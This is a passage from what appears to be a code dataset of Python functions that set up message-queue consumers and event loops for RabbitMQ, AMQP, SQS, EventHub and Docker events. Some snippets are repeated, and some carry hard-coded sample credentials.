self._consumer_rabbit_channel.queue_declare(queue=QueueName.CMD_BUYSELL, durable=True, auto_delete=True)\n # self._logger.info(f\"Consiming to rabbit queue {QueueName.CMD_BUYSELL}\")\n # self._consumer_rabbit_channel.basic_consume(QueueName.CMD_BUYSELL, self.on_cmd_buysell,\n # consumer_tag=\"WebQuikBroker\")\n self._consumer_rabbit_channel.start_consuming()", "def run(self):\n\n def callback(ch, method, properties, body):\n json_body = json.loads(body)\n self.buffer.append(Fvalue.fromdict(json_body))\n\n sleep(5) # We introduce a slight delay to let the RabbitMQ container to accept connections\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.mq_host,port=self.mq_port))\n channel = connection.channel()\n channel.exchange_declare(exchange=self.mq_host + '_exchange', exchange_type='direct')\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=self.mq_host + '_exchange',\n queue=queue_name,\n routing_key=self.routing_key)\n channel.basic_consume(callback,queue=queue_name,no_ack=True)\n channel.start_consuming()", "def start_consuming(self):\n self.logger.debug(\"Issuing consumer related RPC commands\")\n\n self._channel.basic_qos(prefetch_count=self._max_concurrent)\n self._channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\n consume_kwargs = {\"queue\": self._queue_name}\n if PIKA_ONE:\n consume_kwargs[\"on_message_callback\"] = self.on_message\n else:\n consume_kwargs[\"consumer_callback\"] = self.on_message\n\n self._consumer_tag = self._channel.basic_consume(**consume_kwargs)", "def run(self):\n try:\n\n self._connection = self.connect()\n self._connection.ioloop.start()\n except (KeyboardInterrupt, SystemExit):\n self.stop()\n except Exception as e:\n logger.warn(\"Exception: %s\", str(e))\n logger.warn(\"Exception caught on rabbit consumer for process: %s with consumer id %s\", threading.current_thread, str(self.consumer_id))\n 
self.internal_error_queue.put(self.consumer_id)", "def preProcess(self, msg):\n\n # open connection\n self.conn = Connection(\n user=self.user, password=self.password,\n vhost=self.vhost, host=self.host,\n heartbeat=self.heartbeat, debug=self.debug)\n\n # create AMQP channel\n self.channel = self.conn.channel()\n self.channel.exchange.declare(self.exchange, self.exchange_type)\n self.channel.queue.declare(self.queue, self.auto_delete)\n self.channel.queue.bind(self.queue, self.exchange, self.routing_key)", "def preProcess(self, msg):\n\n # open connection\n self.conn = Connection(\n user=self.user, password=self.password,\n vhost=self.vhost, host=self.host,\n heartbeat=self.heartbeat, debug=self.debug)\n\n # create AMQP channel\n self.channel = self.conn.channel()\n self.channel.exchange.declare(self.exchange, self.exchange_type)\n self.channel.queue.declare(self.queue, self.auto_delete)\n self.channel.queue.bind(self.queue, self.exchange, self.routing_key)", "def preProcess(self, msg):\n\n # open connection\n self.conn = Connection(\n user=self.user, password=self.password,\n vhost=self.vhost, host=self.host,\n heartbeat=self.heartbeat, debug=self.debug)\n\n # create AMQP channel\n self.channel = self.conn.channel()\n self.channel.exchange.declare(self.exchange, self.exchange_type)\n self.channel.queue.declare(self.queue, self.auto_delete)\n self.channel.queue.bind(self.queue, self.exchange, self.routing_key)", "def _begin_consuming(self):\n self._consuming = True\n loop = asyncio.get_event_loop()\n self._message_queue = asyncio.Queue(\n maxsize=self.app.settings['SQS_PREFETCH_LIMIT'],\n loop=loop,\n )\n loop.create_task(self._consume())", "def consumeMsg():\n\tosuser = 'osdev'\n\tospass = 'osdev'\n\toshost = '10.32.29.94'\n\tosport = '5672'\n\tosvhost = '/openstack'\n\tneutronExchange = Exchange('quantum', type='topic', durable=False)\n\tinfoQueue = Queue('exthook', exchange=neutronExchange , durable=False,\n\t\t\trouting_key='notifications.info')\n\twith Connection(\"\".join(['amqp://', osuser, ':', ospass, '@', \n\t\toshost, ':',osport, '/', osvhost])) as conn:\n\t\twith conn.Consumer(infoQueue, callbacks=[msgParse]):\n\t\t\twhile True:\n\t\t\t\ttry: \n\t\t\t\t\tconn.drain_events()\n\t\t\t\texcept Exception, e:\n\t\t\t\t\tlogging.exception('Draining events from AMQP stop')\n\t\t\t\t\tbreak", "def start_consuming(self):\n\n for queue in self._handlers.keys():\n self._consumer_tags += self._channel.basic_consume(self.on_message,\n queue=queue)", "def perform_setup():\n global credentials, connection, channel\n credentials = pika.PlainCredentials('guest', 'guest') # AUTH via Default guest user on RabbitMQ\n connection = pika.BlockingConnection(pika.ConnectionParameters(\"127.0.0.1\", 5672, '/', credentials)) # Using rabbit-mq container name to access the RabbitMQ container from other containers\n channel = connection.channel()\n channel.queue_declare(queue='poll', durable=True)", "def start_publishing(self):\n print(f\"{self._connection_param}: Issuing consumer related RPC commands\")\n # self._channel.confirm_delivery(self.on_delivery_confirmation)\n self.schedule_next_message(self.SLOW_SEND)", "async def do_startup(config, output_fname, event_loop):\n\n log.info(\"Creating AMQP receive channel ...\")\n rcv_trans, rcv_proto, rcv_chan = await make_amqp_channel(config)\n\n log.info(\"Setting up event exchange ...\")\n await rcv_chan.exchange_declare(\n exchange_name=config.event_exchange, type_name=\"fanout\"\n )\n\n logger = EventLogger(config, output_fname, event_loop)\n\n for signame in 
[\"SIGINT\", \"SIGTERM\", \"SIGHUP\"]:\n signum = getattr(signal, signame)\n handler = partial(term_handler, signame=signame, loop=event_loop)\n event_loop.add_signal_handler(signum, handler)\n\n log.info(\"Setting up AMQP receiver ...\")\n bm_callback = partial(handle_broker_message, logger)\n await make_receiver_queue(bm_callback, rcv_chan, config, \"\")\n\n return rcv_trans, rcv_proto", "def run(self):\n self.channel.queue_declare(self._request_queue)\n self.channel.basic_consume(self._request_queue, self.on_message)\n try:\n msg = \"Waiting for message ...\"\n print(msg)\n logging.info(msg)\n self.channel.start_consuming()\n except KeyboardInterrupt:\n self.channel.stop_consuming()\n\n self.connection.close()", "def __init__(self, event_queue, connection_options):\n super(GerritEventsStream, self).__init__()\n self._event_queue = event_queue\n self._connection_options = connection_options\n self._running = True", "def run(self):\n\n self.make_connection()\n self.channel()\n self.declare_queue()\n self.publish_message()\n self.close_connection()", "def _setup_tubes(self):\n chan = self.channel\n inp = self.config[self.MODULE_NAME]['amqp']['in']\n out = self.config[self.MODULE_NAME]['amqp']['out']\n if inp['exchange']:\n log.info('generating Input Queue'+ str(inp))\n chan.exchange_declare(**inp)\n self.qname = chan.queue_declare(exclusive=True).queue\n chan.queue_bind(exchange=inp['exchange'],queue=self.qname)\n self.consume = lambda cb : chan.basic_consume(cb,queue=self.qname,no_ack=True)\n self.start_loop = lambda : pika.asyncore_loop()\n\n if out['exchange']:\n log.info('generating Output Exchange'+ str(out))\n chan.exchange_declare(**out)\n self.publish = lambda msg: self.channel.basic_publish(exchange=out['exchange'],routing_key='',body=msg)", "async def run(app):\n app.logger.debug(\"START RABBITMQ \")\n config = app.config.get('RABBITMQ')\n\n app.logger.debug(config)\n\n while True:\n loop = asyncio.get_event_loop()\n\n try:\n app.logger.debug(\"Create connection!\")\n connection = await aio_pika.connect_robust(\n \"amqp://{}:{}@{}\".format(\n config['username'],\n config['password'],\n config['host']\n ), loop=loop\n )\n # Creating channel\n app.logger.debug(\"Create channel\")\n channel = await connection.channel()\n async with connection:\n app.logger.debug(\"create exchange {}\".format(config['exchange_name']))\n await channel.declare_exchange(config['exchange_name'])\n\n app.logger.debug(\"create queue {}\".format(QUEUE_NAME))\n\n queue = await channel.declare_queue(\n QUEUE_NAME, auto_delete=True, durable=False\n )\n await queue.bind(exchange=config['exchange_name'], routing_key='*')\n\n async with queue.iterator() as queue_iter:\n async for message in queue_iter:\n async with message.process():\n content = message.body.decode()\n app.logger.debug(\"RABBITMQ: got message {}\".format(content))\n loop = asyncio.get_event_loop()\n loop.create_task(app.hub.dispatch_message(content))\n except Exception as e:\n app.logger.error(\"Exception in connection with rabbitmq. 
Back of a bit, and try again\")\n app.logger.exception(e)\n await asyncio.sleep(3)", "def listen(self):\n result = self.channel.queue_declare(queue=self.config['queue'], \n exclusive=True)\n if self.endpoints is not None:\n for key in self.endpoints:\n self.channel.queue_bind(exchange=self.config['exchange'], \n queue=self.config['queue'],\n routing_key=f\"sensor_value.{key}\")\n else:\n self.channel.queue_bind(exchange=self.config['exchange'],\n queue=self.config['queue'],\n routing_key=\"sensor_value.#\")\n \n self.channel.basic_consume(queue=self.config['queue'], \n on_message_callback=self.decode_values, \n auto_ack=True)\n\n # starts a while-type loop\n print(\"wabbit eatin hay\")\n self.channel.start_consuming()", "def start_consuming(self):\n # LOGGER.info('Issuing consumer related RPC commands')\n if self._init_ok_ctrl and self._init_ok_task:\n self._channel_ctrl.add_on_cancel_callback(self.on_consumer_ctrl_cancelled)\n self._channel_task.add_on_cancel_callback(self.on_consumer_task_cancelled)\n self._consumer_tag_task = self._channel_task.basic_consume(\n self.queue_task,\n auto_ack=False,\n on_message_callback=self.on_message\n )\n self._consumer_tag_ctrl = self._channel_ctrl.basic_consume(\n self._topic_queue_name,\n auto_ack=False,\n on_message_callback=self.on_topic\n )\n self.was_consuming = True\n self._consuming = True", "def do_start(self):\n threading.Thread(group = None, \n target = self._subscribe_message, name = \"RabbitMQSubscribeThread\") .start()\n threading.Thread(group = None, \n target = self._publish_message, name = \"RabbitMQPublishThread\").start()", "def linkRabbit(self):\n\n print(\"Listening for RabbitMQ messages\")\n\n # RabbitMQ setup\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(host='localhost'))\n channel = connection.channel()\n\n #channel.exchange_declare(exchange='freqSweep', exchange_type='fanout')\n channel.exchange_declare(exchange='pwrSweep', exchange_type='fanout')\n\n result = channel.queue_declare(queue='', exclusive=True)\n queue_name = result.method.queue\n\n # channel.queue_bind(exchange='freqSweep', queue=queue_name)\n channel.queue_bind(exchange='pwrSweep', queue=queue_name)\n channel.basic_consume(queue=queue_name, on_message_callback=self.rabbitCallback, auto_ack=True)\n channel.start_consuming()", "def subscribe_to_commands(self):\n self.basic_consume(self.process_command, queue=self.name)", "def prepare(self):\n if self.prepared:\n return\n self.socket.listen()\n for name in self.socket.getSocketNames():\n self.serverEventHandler.preServe(name)\n for _ in xrange(self.threads):\n thread = Worker(self.tasks)\n thread.setDaemon(True)\n thread.start()\n\n for fileno in self.socket.handles:\n self.poller.read(fileno)\n self.poller.read(self._read.fileno())\n\n self.prepared = True", "def consume_message(message):\n # Assign the message to the global drone_message\n global drone_message\n drone_message = message\n # The Rabbit mq runs in the localhost and the username , password is\n # athavan\n credentials = pika.PlainCredentials('guest', 'guest')\n # Pass the mqhost , port , virtualhost and credentials\n parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)\n connection = pika.SelectConnection(parameters, on_connected)\n try:\n connection.ioloop.start()\n except KeyboardInterrupt:\n # close the connnection\n connection.close()\n # loop until we are fully closed. 
It will stop on its own\n connection.ioloop.start()", "def processEvent(self):\n # Note: break out of event dispatch loop when closedown event is received\n # and closing flag is set. This is to prevent DoS attack by faked closedown\n # event type, and to ensure that prior events received are all processed.\n delay_on_error_min = 0.125 # Back off retry interval on error..\n delay_on_error_max = 20.0 # ..\n delay_on_error = delay_on_error_min # ..\n while True:\n if delay_on_error < delay_on_error_max:\n delay_on_error *= 2\n try:\n # PLEASE NOTE: In the event that the HTTPC is run as duplex, not simplex\n # then the post methods will be delayed if nothing is sent down to the client\n # from the server. This timeout is controlled by QUEUE_WAIT_TIMEOUT in EventRouterHTTPS.py\n if self._simplex == True:\n self._queueEvent.wait()\n self._queueEvent.clear()\n \n if not self._queue.empty():\n Trace(\"%s queue.get ...\"%(self.getUri()), \"EventLib.EventRelayHTTPC\")\n ###msgbody = self._queue.get()\n ###Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n ###self._event.set()\n msgbody = self.getQueuedItem()\n [typ,env] = msgbody\n if typ == \"closedown\":\n if self._closing: break\n else:\n # process request as an HTTP POST request\n data = makeEnvelopeData(env)\n headers = { \"Content-type\": \"text/plain\",\n \"Accept\": \"text/plain\",\n \"Content-length\": str(len(data)) }\n self._httpcon.request(\"POST\", \"/request_path_ignored\", data, headers)\n response = self._httpcon.getresponse()\n delay_on_error = delay_on_error_min\n elif self._simplex == False:\n # Nothing in queue:\n # issue a GET for incoming events\n _log.info(\"%s HTTP get ...\"%(self.getUri()))\n headers = { \"Accept\": \"text/plain\" }\n self._httpcon.request(\"GET\", \"/request_path_ignored\", None, headers)\n response = self._httpcon.getresponse()\n if response.status == 200:\n delay_on_error = delay_on_error_min\n msgbody = response.read()\n Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n # Parse message and act accordingly\n msgdata = parseMessageData(msgbody)\n Trace(\"%s get msgdata: %s\"%(self.getUri(),str(msgdata)), \"EventLib.EventRelayHTTPC\")\n if msgdata == None:\n #TODO: Log \"Request body malformed\"\n pass\n elif msgdata[0] == \"forward\":\n # msgdata = [\"forward\", [['R1', 'R2', 'R3'], 'ev:typ', 'ev:src', 'payload']]\n event = makeEvent(evtype=msgdata[1][1],source=msgdata[1][2],payload=msgdata[1][3])\n env = constructEnvelope(msgdata[1][0], event)\n self.forward(event, env)\n elif msgdata[0] == \"idle\":\n # Idle response gives client a chance to send if anything is queued\n pass\n else:\n #TODO: handle closedown message?\n Warn( \"%s Request body unrecognized option: %s\"%(self.getUri(),msgdata[0]), \"EventRelayHTTPC\")\n pass\n elif response.status == 503:\n Trace( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n # Remote end closed down\n break\n else:\n # TODO: (log error response)\n Warn( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n \n except httplib.BadStatusLine, e:\n # This can happen at closedown\n Info( \"%s processEvent bad response: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.CannotSendRequest, e:\n # This can happen at closedown\n Info( \"%s Cannot send request: %s\"%(self.getUri(), 
str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.ResponseNotReady, e:\n # This can happen at startup and sometimes other times:\n # maybe multiple requests on a single HTTP connection object?\n Info( \"%s Response not ready: (%s)\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except socket.error, e:\n Warn( \"%s Socket error: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n return", "def __init__(self, amqp_url, *handlers):\n\n self._consumer_tags = []\n\n RabbitMQ.__init__(self, amqp_url)\n\n # save our handlers for ruture use\n self._handlers = {}\n for handle in handlers:\n for k, v in handle.handlers().items():\n self._handlers[k] = v", "def consume(self):\n LOGGER.debug('Consumer Initialized')\n # self.connect()\n channel = self.get_channel()\n self._bind_things(channel)\n\n try:\n LOGGER.info('Start consuming')\n channel.start_consuming()\n except ConnectionClosed:\n LOGGER.exception('Pika connection closed detected. Will attempt to start consuming again')\n self.consume()\n except KeyboardInterrupt as e:\n LOGGER.info('Keyboard interrupt, stop consuming')\n self.shutdown()\n raise e\n except Exception as e:\n LOGGER.exception(\"'%s\" % str(e))\n self.shutdown()\n if self.settings.CONSUMER['RAISE_EXCEPTION']:\n LOGGER.info(\"CONSUMER RAISED EXCEPTION\")\n raise e", "def receive_incoming_messages_thread(self):\n\n def on_error(partition_context, error):\n logger.error(\"EventHub on_error: {}\".format(str(error) or type(error)))\n\n def on_partition_initialize(partition_context):\n logger.warning(\"EventHub on_partition_initialize\")\n\n def on_partition_close(partition_context, reason):\n logger.warning(\"EventHub on_partition_close: {}\".format(reason))\n\n def on_event(partition_context, event):\n reset_watchdog()\n if event:\n self.executor.submit(self.dispatch_incoming_message, event)\n\n logger.info(\"Starting EventHub receive\")\n with self.eventhub_consumer_client:\n self.eventhub_consumer_client.receive(\n on_event,\n on_error=on_error,\n on_partition_initialize=on_partition_initialize,\n on_partition_close=on_partition_close,\n max_wait_time=30,\n )", "def ProcessEvents(self):\n self.work_queue.put(self.__ProcessEventsAsync)", "def receive(channel):\n\n def callback(ch, method, properties, body):\n\n event = json.loads(body)\n event_info = event['event_info']\n event_type = event['type']\n success = True\n logger.info(f\"Received event {event}\")\n\n try:\n # Events coming from account microservice\n\n if event_type == USER_CREATED_EVENT:\n\n add_and_publish_event(\n GlobalPreferencesCreatedEvent(event['uuid'], event_info['id'], dict(\n vehicles=['bus', 'subway', 'train', 'tram', 'car', 'walking', 'bike', 'taxi',\n 'enjoy', 'mobike'],\n personal_vehicles=[])),\n PREFERENCES_CREATED)\n\n elif event_type == USER_DELETED_EVENT:\n\n add_and_publish_event(GlobalPreferencesDeletedEvent(event['uuid'], event_info['id']), PREFERENCES_DELETED)\n\n # Events generated in this microservice\n\n elif event_type == PREFERENCES_CREATED_EVENT:\n add_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_MODIFIED_EVENT:\n modify_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_DELETED_EVENT:\n delete_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == CALENDAR_CREATED_EVENT:\n add_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_MODIFIED_EVENT:\n 
modify_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_DELETED_EVENT:\n delete_calendar(Calendar(**event_info))\n\n except SQLAlchemyError as e:\n\n # to deal with at least once delivery of rabbitmq and the create methods which are not idempotent\n if (event_type == USER_CREATED_EVENT or event_type == PREFERENCES_CREATED_EVENT or event_type == CALENDAR_CREATED_EVENT) \\\n and method.redelivered and isinstance(e, IntegrityError):\n logger.info(f'Not processed redelivered event {event}')\n\n else:\n logger.info(f\"Couldn't process event {event}\")\n success = False\n\n finally:\n if success: # ack only if the event has been processed\n ch.basic_ack(delivery_tag=method.delivery_tag)\n logger.info(f\"Processed and acked event {event}\")\n\n # channel.basic_qos(prefetch_count=1)\n channel.basic_consume(callback,\n queue=CALENDAR_QUEUE)\n\n logger.info(\"Started listening to events\")\n channel.start_consuming()", "def run(self):\n self.logger.info(\"starting Dashi consumer\")\n while not self.shutdown:\n self.rpc.listen()", "def collect_data(self):\n self.logger.info(\"Waiting for incoming data ...\")\n while True:\n item = self.in_queue.get()\n self.logger.info(\"Received data!\")\n self.collector_process_data(item)", "def run(self) -> None:\n while self.data_incoming or len(self._queue):\n if not self._queue:\n logging.info(\"Consumer %d is sleeping since queue is empty\", self._name)\n time.sleep(0.75)\n print(self._queue.get())\n time.sleep(0.5)", "def start_consuming(self, channel, rx_queue_name):\n if self.should_stop():\n logger.info(\"ready to stop, pause to consume\")\n return\n logger.info('Issuing consumer related RPC commands')\n self._consumer_tag = channel.basic_consume(\n self.on_message, rx_queue_name, auto_ack = False)\n channel.start_consuming()", "def handle_events(self):\n self._busy_mutext.acquire()\n try:\n event = self.EventsFactory.pull_event()\n while event:\n self.logger.debug('Handling new event: {}'.format(event.id))\n event_endpoint_scope_classes = event.EndpointScope.get_static_hierarchy()\n stat_collection = []\n for statistics_cls in self._statistics:\n if statistics_cls.EndpointScope in event_endpoint_scope_classes:\n statistics = statistics_cls.init_by_event(event)\n self.logger.debug(f'Collecting statistics: {statistics}')\n stat_collection.append(statistics)\n statistics.collect()\n self.logger.debug('Checking for tasks to run')\n for task_cls in self.get_conditional_tasks():\n if task_cls.EndpointScope in event_endpoint_scope_classes:\n task_endpoint_scope_classes = task_cls.EndpointScope.get_static_hierarchy()\n statistics = []\n for stats in stat_collection:\n if stats.Endpoint == task_cls.Endpoint and stats.EndpointScope in task_endpoint_scope_classes:\n statistics.append(stats)\n task = task_cls(event.EndpointScope.init_by_event(event), statistics, event)\n task.handle()\n event = self.EventsFactory.pull_event()\n finally:\n self._busy_mutext.release()", "def start(self):\n self._connect()\n self._init_exchange()\n self._init_queue()\n self._bind_queue()", "def __init__(self, routing_key):\n self.routing_key = routing_key\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=rabbitmq_hostname))\n self.channel = self.connection.channel()\n result = self.channel.queue_declare(queue='', exclusive=True, durable=True)\n self.callback_queue = result.method.queue\n\n self.channel.basic_consume(\n queue=self.callback_queue,\n on_message_callback=self.on_response,\n auto_ack=True\n )", "async def run(self):\n\n 
self.connection = await aio_pika.connect(self.mq_connection_str, loop=asyncio.get_event_loop())\n self.channel = await self.connection.channel()\n\n # connect to exchanger market data\n # market data send with routing key format: message_type.data_type.exchange.pair[.time_frame]\n # message_type == update | starting, data_type == ticker | candles | depth,\n # exchange, pair, time_frame - sending by listing_info\n binding_mask = '*.*.*.#'\n topic_logs_exchange = await self.channel.declare_exchange(self.exchanger, aio_pika.ExchangeType.TOPIC)\n queue_topic = await self.channel.declare_queue('', auto_delete=True)\n await queue_topic.bind(topic_logs_exchange, routing_key=binding_mask)\n\n # listener queue for listing information\n queue_for_listing = await self.channel.declare_queue('', auto_delete=True)\n await queue_for_listing.bind(topic_logs_exchange, routing_key=self.name_queue_for_listing)\n\n # listener queue for error\n queue_for_error = await self.channel.declare_queue('', auto_delete=True)\n await queue_for_error.bind(topic_logs_exchange, routing_key=self.name_queue_for_error)\n\n def callback_crypto_currency_market_data(message):\n \"\"\"Callback for consume market data\"\"\"\n body = json.loads(message.body.decode('utf-8'))\n \n # routing_key have view: message_type.data_type.exchange.pair[.time_frame]\n # message_type == update | starting, data_type == ticker | candles | depth,\n # exchange, pair, time_frame - sending by listing_info\n # mask: *.*.*.#\n message_type = message.routing_key.split('.')[0]\n data_id = '.'.join(message.routing_key.split('.')[1:])\n\n if message_type == 'update':\n for observer in self.subscribers.get(data_id):\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=message.routing_key,\n data=body\n )\n ))\n elif message_type == 'starting':\n # if exist waiters, send data and move waiters in subscribers\n if not self.waiters_first_msg.get(data_id):\n return\n\n new_subscribers = []\n while self.waiters_first_msg[data_id]:\n observer = self.waiters_first_msg[data_id].pop()\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=message.routing_key,\n data=body\n )\n ))\n new_subscribers.append(observer)\n\n # if not subscribers on this data_id, init new dict-value, else append to exist array\n subscribers = self.subscribers.get(data_id, None)\n if not subscribers and new_subscribers:\n self.subscribers[data_id] = new_subscribers\n asyncio.get_event_loop().create_task(self._send_message_for_subscribe(data_id))\n else:\n for new_subscriber in new_subscribers:\n if new_subscriber not in self.subscribers[data_id]:\n self.subscribers[data_id].append(new_subscriber)\n\n def callback_crypto_currency_listing(message):\n \"\"\"Callback for consume information about access pairs, exchanges and timeframes\"\"\"\n body = json.loads(message.body.decode('utf-8'))\n data_id = TYPE_LISTING\n\n if not self.waiters_first_msg.get(data_id):\n return\n\n while self.waiters_first_msg[data_id]:\n observer = self.waiters_first_msg[data_id].pop()\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=data_id,\n data=body\n )\n ))\n\n def callback_crypto_currency_error(message):\n \"\"\"Callback for consume error queue\"\"\"\n logger.error(message.body.decode('utf-8'))\n\n body = json.loads(message.body.decode('utf-8'))\n\n # validation\n error_place = body.get('error_place')\n message = 'Sorry! 
Error on server'\n if not message or not error_place:\n return\n\n # send information to ws, that wait or subscribe on error_place\n waiters = self.waiters_first_msg.get(error_place, ())\n for observer in waiters:\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=error_place,\n error=message\n )\n ))\n\n subscribers = self.subscribers.get(error_place, ())\n for observer in subscribers:\n asyncio.get_event_loop().create_task(observer.update(\n dict(\n data_id=error_place,\n data=message\n )\n ))\n\n await queue_topic.consume(callback_crypto_currency_market_data)\n await queue_for_listing.consume(callback_crypto_currency_listing)\n await queue_for_error.consume(callback_crypto_currency_error)", "def run(self):\n\t\tfor item in self.pubSub.listen():\n\t\t\tself.processItem(item)", "def run_task(self):\n process_market_data_coro = self._process_queue(\n callback=self._handle_market_data,\n socket_info=self._market_data_sock_info,\n has_heartbeat_seq=False)\n\n async def listen_market_data():\n try:\n await self._open_market_data_websocket()\n await self._listen_on_market_data()\n finally:\n await self._market_data_sock_info.ws.close()\n\n # If we are not authenticated, return just the market data coroutines.\n if not self._authenticate:\n return asyncio.gather(listen_market_data(), process_market_data_coro)\n\n process_orders_coro = self._process_queue(callback=self._handle_orders,\n socket_info=self._orders_sock_info)\n\n async def listen_orders():\n try:\n await self._open_orders_websocket()\n await self._listen_on_orders()\n finally:\n await self._orders_sock_info.ws.close()\n\n async def first_notify():\n await self.setup_event()\n self.exchange_state.update_publisher.notify(\n description=\"Initialized.\")\n\n return asyncio.gather(listen_orders(), process_orders_coro,\n listen_market_data(), process_market_data_coro,\n first_notify())", "def _consume(self):\n # HACK: run_in_executor is used as a workaround to use boto\n # inside a coroutine. 
This is a stopgap solution that should be\n # replaced once boto has support for asyncio or aiobotocore has\n # a stable release.\n loop = asyncio.get_event_loop()\n receive_message = partial(\n self.client.receive_message,\n QueueUrl=self.app.settings['SQS_INBOUND_QUEUE_URL'],\n AttributeNames=self.app.settings['SQS_ATTRIBUTE_NAMES'],\n MessageAttributeNames=self.app.settings['SQS_MESSAGE_ATTRIBUTES'],\n MaxNumberOfMessages=self.app.settings['SQS_MESSAGE_BATCH_SIZE'],\n VisibilityTimeout=self.app.settings['SQS_VISIBILITY_TIMEOUT'],\n WaitTimeSeconds=self.app.settings['SQS_WAIT_TIME'],\n )\n while True:\n future = loop.run_in_executor(None, receive_message)\n messages = yield from future\n for message in messages.get('Messages', []):\n message['Body'] = json.loads(message['Body'])\n yield from self._message_queue.put(message)", "def execute(self):\n self.running = True\n last_timestamp = datetime.datetime.now()\n\n self.log(\"Starting...\")\n while self.running:\n\n try:\n\n # if (datetime.datetime.now() - last_timestamp).total_seconds() < self.sendfreq:\n # self.tick()\n # continue\n\n # if self.debug:\n\n sent = 0\n while self.inbox.qsize() > 0:\n\n # Boolean flag to determine message validity\n valid = True\n\n # get message\n message = self.inbox.get_nowait()\n\n # Iterates over all the filters and overrides to modify the\n # stream's default capability.\n for modifier in self.modifiers:\n if isinstance(modifier, BaseOverride):\n message = modifier.apply(message)\n elif isinstance(modifier, BasePredicate):\n if not modifier.apply(message):\n valid = False\n\n # Must be a break and not return because setting\n # the initialization flag would be skipped if it\n # needed to be set.\n break\n\n # the incoming message was not filtered\n if valid:\n\n # process the incoming message\n self.handle(message)\n\n sent += 1\n\n if self.sendlimit > 0:\n if sent >= self.sendlimit:\n break\n\n # logging sent messages\n self.log(\"Sent %s messages...\" % (sent - 1 if sent > 0 else 0))\n\n except Empty:\n # Empty signifies that the queue is empty, so yield to another node\n pass\n except Exception:\n self.log_exception(\"Error in '%s': %s\" % (self.__class__.__name__, self.name))\n # self.tick()\n finally:\n # delay processing\n self.sleep(self.sendfreq)\n\n # self.tick()\n # self.stop()\n self.log(\"Exiting...\")", "def run_collectd_amqp(self):\n amqp_url = 'amqp://admin:admin@{}:{}/%2F'.format(self.mgmt['ip'], self.AMPQ_PORT)\n amqp = AmqpConsumer(amqp_url, self._queue)\n try:\n amqp.run()\n except (AttributeError, RuntimeError, KeyboardInterrupt):\n amqp.stop()", "def consume(docker_client, redis_client):\n print 'Start consuming events from %s' % docker_client.base_url\n since = redis_client.get('castor:last_event')\n for event in docker_client.events(decode=True, since=since):\n for hook in settings.HOOKS:\n tasks.dispatch_event.delay(event, hook)\n redis_client.set('castor:last_event', event['time'])", "def run(self):\n print('starting up on {} port {}'.format(*self.listener_address))\n self.selector.register(self.listener, selectors.EVENT_READ)\n\n # Serialize our listener's host and port\n serializedAdd = fxp_bytes_subscriber.serialize_address(\n self.listener_address[0], self.listener_address[1])\n\n # Contact with Publisher\n self.listener.sendto(serializedAdd, self.gcd_address)\n\n while True:\n events = self.selector.select(CHECK_INTERVAL)\n for key, mask in events:\n data = self.receive_message()\n self.removeOldQuote()\n self.createGraph(data)\n self.arbitrage()\n self.checkTimeout()", 
"def start(self) -> None:\n conn_manager = ConnectionManager(broker_host=self.broker_host, queue=self.queue)\n channel = conn_manager.start_channel()\n channel.basic_consume(queue=self.queue, on_message_callback=self.callback)\n\n try:\n print(\"PV Simulator...\")\n channel.start_consuming()\n except KeyboardInterrupt:\n pass", "async def start(self):\n\n while True:\n try:\n data = await self.reader.read(8192)\n\n if self._trace_enabled:\n self._logger.trace(\n \"Received %d bytes from remote server:\\n%s\",\n len(data),\n msg.dump(data),\n )\n await self.process(data)\n except asyncio.CancelledError:\n return\n except:\n logging.exception(\"Unhandled error in Message Reader\")\n raise", "async def consume_items_from_rabbitmq(queue):\n ctr = 0\n start = time.time()\n while True:\n await asyncio.sleep(0.001)\n for method_frame, properties, body in channel.consume(queue_name, inactivity_timeout=1):\n if method_frame:\n # print(body)\n while queue.full():\n await asyncio.sleep(0.001)\n # await queue.put(body)\n queue.put_nowait(body)\n # Acknowledge the message\n channel.basic_ack(method_frame.delivery_tag)\n ctr += 1\n if not ctr % 1000:\n end = time.time() - start\n print(f'elapsed time: {end:.3f}\\tmessages received: {ctr}')\n else:\n # empty remaining items from queue\n while queue.qsize():\n await asyncio.sleep(0.001)\n end = time.time() - start\n print(f'elapsed time: {end:.3f}\\tmessages received: {ctr}')\n break\n await asyncio.sleep(0.001)\n\n requeued_messages = channel.cancel()", "def on_queue_declared(frame):\n channel.basic_consume(handle_delivery, queue='test')", "def read(self):\n log.info(\"==>\")\n # TODO exceptions\n assert self.subscription_list is not None\n if not self.is_once():\n assert self.read_queue is not None\n event = None\n first_sample = True\n while True:\n log.debug(\"Processing event type %s\", event)\n # SAMPLE is handled in the same way as \"first_sample\"\n if first_sample or event == self.SubscriptionEvent.SAMPLE:\n response = self.sample(\n start_monitoring=self.is_monitor_changes() and first_sample)\n yield response\n if first_sample:\n yield self.sync_response()\n first_sample = False\n if self.is_once():\n break\n elif event == self.SubscriptionEvent.FINISH:\n log.debug(\"finishing subscription read\")\n break\n elif event == 